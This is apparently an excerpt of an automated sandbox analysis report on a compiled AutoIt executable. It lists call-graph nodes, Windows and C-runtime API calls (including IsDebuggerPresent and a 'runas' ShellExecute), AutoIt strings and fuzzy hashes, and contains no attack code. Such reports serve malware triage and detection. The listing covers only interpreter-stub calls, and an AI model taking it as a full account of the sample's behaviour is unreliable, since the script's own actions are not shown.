66392->66397 66394 414139 __stbuf 46 API calls 66393->66394 66393->66397 66395 414470 66394->66395 66434 41b7b2 77 API calls 6 library calls 66395->66434 66398 414139 66397->66398 66399 414145 66398->66399 66400 41415a 66398->66400 66435 417f77 46 API calls __getptd_noexit 66399->66435 66400->66370 66402 41414a 66436 417f25 10 API calls __wcsnicmp 66402->66436 66404 414155 66404->66370 66406 41e200 __wsopen_helper 66405->66406 66407 41e223 66406->66407 66408 41e208 66406->66408 66410 41e22f 66407->66410 66413 41e269 66407->66413 66457 417f8a 46 API calls __getptd_noexit 66408->66457 66459 417f8a 46 API calls __getptd_noexit 66410->66459 66411 41e20d 66458 417f77 46 API calls __getptd_noexit 66411->66458 66437 41ae56 66413->66437 66415 41e234 66460 417f77 46 API calls __getptd_noexit 66415->66460 66418 41e26f 66420 41e291 66418->66420 66421 41e27d 66418->66421 66419 41e23c 66461 417f25 10 API calls __wcsnicmp 66419->66461 66462 417f77 46 API calls __getptd_noexit 66420->66462 66447 41e17f 66421->66447 66423 41e215 __wsopen_helper 66423->66365 66426 41e289 66464 41e2c0 LeaveCriticalSection __unlock_fhandle 66426->66464 66427 41e296 66463 417f8a 46 API calls __getptd_noexit 66427->66463 66430->66365 66431->66380 66432->66383 66433->66383 66434->66397 66435->66402 66436->66404 66438 41ae62 __wsopen_helper 66437->66438 66439 41aebc 66438->66439 66441 4182cb __lock 46 API calls 66438->66441 66440 41aec1 EnterCriticalSection 66439->66440 66442 41aede __wsopen_helper 66439->66442 66440->66442 66443 41ae8e 66441->66443 66442->66418 66444 41aeaa 66443->66444 66445 41ae97 InitializeCriticalSectionAndSpinCount 66443->66445 66446 41aeec ___lock_fhandle LeaveCriticalSection 66444->66446 66445->66444 66446->66439 66448 41aded __lseek_nolock 46 API calls 66447->66448 66449 41e18e 66448->66449 66450 41e1a4 SetFilePointer 66449->66450 66451 41e194 66449->66451 66453 41e1c3 66450->66453 66454 41e1bb GetLastError 66450->66454 66452 417f77 __wcsnicmp 46 API calls 66451->66452 66455 
41e199 66452->66455 66453->66455 66456 417f9d __dosmaperr 46 API calls 66453->66456 66454->66453 66455->66426 66456->66455 66457->66411 66458->66423 66459->66415 66460->66419 66461->66423 66462->66427 66463->66426 66464->66423 66466 4149ea 66465->66466 66467 4149fe 66465->66467 66511 417f77 46 API calls __getptd_noexit 66466->66511 66470 41443c __flush 77 API calls 66467->66470 66479 4149fa 66467->66479 66469 4149ef 66512 417f25 10 API calls __wcsnicmp 66469->66512 66472 414a0a 66470->66472 66484 41d8c2 66472->66484 66475 414139 __stbuf 46 API calls 66476 414a18 66475->66476 66488 41d7fe 66476->66488 66478 414a1e 66478->66479 66480 413748 _free 46 API calls 66478->66480 66483 414ab2 LeaveCriticalSection LeaveCriticalSection _fprintf 66479->66483 66480->66479 66481->66214 66482->66221 66483->66221 66485 41d8d2 66484->66485 66487 414a12 66484->66487 66486 413748 _free 46 API calls 66485->66486 66485->66487 66486->66487 66487->66475 66489 41d80a __wsopen_helper 66488->66489 66490 41d812 66489->66490 66491 41d82d 66489->66491 66528 417f8a 46 API calls __getptd_noexit 66490->66528 66492 41d839 66491->66492 66497 41d873 66491->66497 66530 417f8a 46 API calls __getptd_noexit 66492->66530 66495 41d817 66529 417f77 46 API calls __getptd_noexit 66495->66529 66496 41d83e 66531 417f77 46 API calls __getptd_noexit 66496->66531 66500 41ae56 ___lock_fhandle 48 API calls 66497->66500 66502 41d879 66500->66502 66501 41d846 66532 417f25 10 API calls __wcsnicmp 66501->66532 66504 41d893 66502->66504 66505 41d887 66502->66505 66533 417f77 46 API calls __getptd_noexit 66504->66533 66513 41d762 66505->66513 66508 41d88d 66534 41d8ba LeaveCriticalSection __unlock_fhandle 66508->66534 66510 41d81f __wsopen_helper 66510->66478 66511->66469 66512->66479 66535 41aded 66513->66535 66515 41d772 66516 41d7c8 66515->66516 66518 41d7a6 66515->66518 66520 41aded __lseek_nolock 46 API calls 66515->66520 66548 41ad67 47 API calls 2 library calls 66516->66548 66518->66516 66521 41aded __lseek_nolock 
46 API calls 66518->66521 66519 41d7d0 66522 41d7f2 66519->66522 66549 417f9d 46 API calls 3 library calls 66519->66549 66523 41d79d 66520->66523 66524 41d7b2 CloseHandle 66521->66524 66522->66508 66526 41aded __lseek_nolock 46 API calls 66523->66526 66524->66516 66527 41d7be GetLastError 66524->66527 66526->66518 66527->66516 66528->66495 66529->66510 66530->66496 66531->66501 66532->66510 66533->66508 66534->66510 66536 41ae12 66535->66536 66537 41adfa 66535->66537 66539 417f8a __read_nolock 46 API calls 66536->66539 66542 41ae51 66536->66542 66538 417f8a __read_nolock 46 API calls 66537->66538 66540 41adff 66538->66540 66541 41ae23 66539->66541 66543 417f77 __wcsnicmp 46 API calls 66540->66543 66544 417f77 __wcsnicmp 46 API calls 66541->66544 66542->66515 66545 41ae07 66543->66545 66546 41ae2b 66544->66546 66545->66515 66547 417f25 __wcsnicmp 10 API calls 66546->66547 66547->66545 66548->66519 66549->66522 66551 414c82 __wsopen_helper 66550->66551 66552 414cc3 66551->66552 66553 414cbb __wsopen_helper 66551->66553 66558 414c96 __wctomb_s_l 66551->66558 66554 415471 __lock_file 47 API calls 66552->66554 66553->66224 66555 414ccb 66554->66555 66563 414aba 66555->66563 66577 417f77 46 API calls __getptd_noexit 66558->66577 66559 414cb0 66578 417f25 10 API calls __wcsnicmp 66559->66578 66567 414ad8 __wctomb_s_l 66563->66567 66570 414af2 66563->66570 66564 414ae2 66630 417f77 46 API calls __getptd_noexit 66564->66630 66566 414ae7 66631 417f25 10 API calls __wcsnicmp 66566->66631 66567->66564 66567->66570 66574 414b2d 66567->66574 66579 414cfa LeaveCriticalSection LeaveCriticalSection _fprintf 66570->66579 66571 414c38 __wctomb_s_l 66633 417f77 46 API calls __getptd_noexit 66571->66633 66572 414139 __stbuf 46 API calls 66572->66574 66574->66570 66574->66571 66574->66572 66580 41dfcc 66574->66580 66610 41d8f3 66574->66610 66632 41e0c2 46 API calls 3 library calls 66574->66632 66577->66559 66578->66553 66579->66553 66581 41dfd8 __wsopen_helper 66580->66581 66582 41dfe0 
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004096C1
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 0040970C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 00409D96
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 0040A6C4
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 004297E5
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2383988440-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                                                                                                                                                                                                                                                                                                                                                                                • runas, xrefs: 0042E2AD, 0042E2DC
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2495805114-3383388033
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0SH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3363477735-851180471
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: IsThemeActive$uxtheme.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-3542929980
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                                                                                                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                                                                                                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                                                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1762048999-758534266

                                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00402007
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00402033
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00402049
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0040207C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3948761352-1609664196

                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncat.LIBCMT ref: 0040E433
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wmakepath.LIBCMT ref: 0040E44F
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0040E487
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00427541
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00427551
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00427562
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0042757C
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 004275BC
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Include$\

                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _fseek.LIBCMT ref: 0045292B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452961
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452971
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 0045298A
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 004529A5
                                                                                                                                                                                                                                                                                                                                                                                                                                • _fseek.LIBCMT ref: 004529BF
                                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 004529CA
                                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 004529D6
                                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 004529E7
                                                                                                                                                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00452A17
                                                                                                                                                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00452A20
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: __fread_nolock$_free_fseek_malloc_wcscpy
• String ID:
• API String ID: 1255752989-0

Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: __fread_nolock$_fseek_wcscpy
• String ID: FILE
• API String ID: 3888824918-3121273764

APIs
• GetSysColorBrush.USER32(0000000F), ref: 004104C3
• RegisterClassExW.USER32(00000030), ref: 004104ED
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
• InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
• LoadIconW.USER32(00400000,000000A9), ref: 00410542
• ImageList_ReplaceIcon.COMCTL32(00A67998,000000FF,00000000), ref: 00410552
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915

APIs
• GetSysColorBrush.USER32(0000000F), ref: 0041039B
• LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
• LoadIconW.USER32(?,00000063), ref: 004103C0
• LoadIconW.USER32(?,000000A4), ref: 004103D3
• LoadIconW.USER32(?,000000A2), ref: 004103E6
• LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
